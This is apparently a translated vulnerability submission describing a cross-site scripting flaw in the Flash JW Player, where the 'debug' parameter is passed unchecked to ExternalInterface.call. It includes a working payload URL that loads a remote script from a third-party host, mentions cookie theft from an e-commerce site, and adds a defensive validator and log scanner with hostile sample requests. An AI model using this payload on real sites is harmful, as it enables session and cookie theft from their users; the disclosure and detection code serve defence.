A player developed abroad and used by more than a million websites. The official introduction reads: "LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the – JW Player – is active on over one million websites and streams billions of videos each month."

The Flash version of this video player has a security flaw in how its code is written; with a trick I have used before, it can be turned into a cross-site scripting (XSS) attack.
An XSS on the vendor's own site would not matter much, but the other websites that embed this player are another story.
For example, China's Qunar (去哪儿), and various sites in the US..

An XSS vulnerability in JW Player

Test browsers: IE, Firefox.

Test platform: Windows 7.

1. The bug is in this code (decompiled from the Flash player, class com.longtailvideo.jwplayer.utils.Logger):

package com.longtailvideo.jwplayer.utils {
    import flash.external.ExternalInterface;

    public class Logger {
        private static var _config:Object; // populated from loaderInfo.parameters (flashvars / query string)

        private static function send(text:String):void {
            if (ExternalInterface.available) {
                ExternalInterface.call(_config.debug, text); // <-- _config.debug is used directly as the callback name
            }
        }
    }
}

2. _config.debug is passed directly as the first parameter (the JavaScript function name) of ExternalInterface.call, and _config is loaded from loaderInfo.parameters, i.e. from the flashvars or the query string. Therefore, when we construct a link such as "jwplayer.swf?debug=(function(){alert('xxx')})()", the JavaScript passed in is executed.

3. Then we can use the trick location.href='javascript:"<script src={js file url}></script>"' to load and run an external JavaScript file.

Test payload (URL-encoded):

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)
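The defensive counterpart to steps 1 to 3, added here as an example that is not JW Player's own code: the check the Logger above lacks (the callback name must be a plain dotted identifier, because Flash Player splices it into JavaScript source), plus a scanner that flags requests whose debug flashvar would fail that check. The access-log lines, the example.invalid host and the optional allowlist are constructed assumptions.

```javascript
// Added example (not JW Player code). Flash Player builds JavaScript source around the
// callback name given to ExternalInterface.call, so anything beyond a plain (dotted)
// identifier in "debug" runs as code in the embedding page.

// A legitimate callback is an identifier path such as "console.log" or "myPlayer.onLog".
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

// Returns true only for a syntactically safe callback name. When `allowed` is given, the
// name must also be one the embedding page registered (an assumed deployment policy).
function isSafeCallbackName(name, allowed = null) {
  if (typeof name !== 'string' || name.length > 64 || !SAFE_CALLBACK.test(name)) return false;
  return allowed === null || allowed.has(name);
}

// Pulls the decoded "debug" flashvar out of a *.swf request URL; null if absent.
function debugParamFromUrl(rawUrl) {
  const url = new URL(rawUrl);
  if (!/\.swf$/i.test(url.pathname)) return null;
  return url.searchParams.get('debug');
}

// Constructed access-log lines (Apache combined format) mixing benign and hostile requests.
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Mar/2011:12:00:01 +0800] "GET /static/img/player.swf?file=a.flv&debug=console.log HTTP/1.1" 200 91234',
  '203.0.113.5 - - [10/Mar/2011:12:00:07 +0800] "GET /static/img/player.swf?debug=(function()%7Balert(%27xxx%27)%7D)() HTTP/1.1" 200 91234',
  '198.51.100.9 - - [10/Mar/2011:12:01:15 +0800] "GET /static/img/player.swf?debug=alert HTTP/1.1" 200 91234',
  '198.51.100.9 - - [10/Mar/2011:12:02:40 +0800] "GET /media/player.swf?debug=function(){alert(/xxx/)} HTTP/1.1" 200 91234',
  '198.51.100.9 - - [10/Mar/2011:12:03:02 +0800] "GET /index.html HTTP/1.1" 200 5120',
];

// Scans log lines and returns the requests whose debug value would not pass the check.
// `host` only makes the logged request path parseable as an absolute URL.
function findUnsafeDebugRequests(lines, allowed = null, host = 'http://example.invalid') {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"GET (\S+) HTTP\//);
    if (!m) continue;
    const debug = debugParamFromUrl(host + m[1]);
    if (debug !== null && !isSafeCallbackName(debug, allowed)) {
      hits.push({ path: m[1].split('?')[0], debug });
    }
  }
  return hits;
}

console.log(findUnsafeDebugRequests(SAMPLE_LOG)); // the two requests carrying code, not a name
```

Note that a bare `debug=alert` passes the identifier check, since it is a legal callback name; only the allowlist form rejects it.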

1. Simple alert

2. Cookies stolen from a Chinese e-commerce website.

List of addresses found to be vulnerable:


Source: WooYun vulnerability submission platform
